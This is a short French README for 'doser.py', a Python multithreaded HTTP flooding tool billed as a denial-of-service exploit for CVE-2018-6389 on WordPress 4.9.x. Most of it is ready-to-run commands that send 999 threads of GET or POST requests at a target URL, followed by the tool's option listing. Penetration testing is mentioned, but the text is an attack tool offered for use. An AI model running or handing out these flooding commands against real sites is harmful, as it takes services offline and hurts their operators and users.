
Exploit de déni de service basé sur Python pour CVE-2018-6389 ciblant WordPress 4.9.x. Prend en charge les requêtes GET/POST multithreadées avec en-têtes personnalisés et charges utiles JSON pour les tests de pénétration.
Outil DoS pour requêtes HTTP (inspiré de hulk mais avec plus de fonctionnalités) écrit en Python :
999 threads envoient des requêtes GET :
python doser.py -t 999 -g 'https://targeted.site.com'
999 threads envoient des requêtes POST avec des données json :
python doser.py -t 999 -p 'https://targeted.site.com' -ah 'Content-Type: application/json' -d '{"json": "payload"}'
usage: doser.py [-h] [-g G] [-p P] [-d D] [-ah AH] [-t T]
arguments optionnels :
-h, --help affiche ce message d'aide et quitte
-g Spécifie une requête GET. Utilisation : -g '< url >'
-p Spécifie une requête POST. Utilisation : -p '< url >'
-d Spécifie les données pour une requête POST
-ah Spécifie un en-tête supplémentaire
-t Spécifie le nombre de threads à utiliser
Réécrire en Golang :)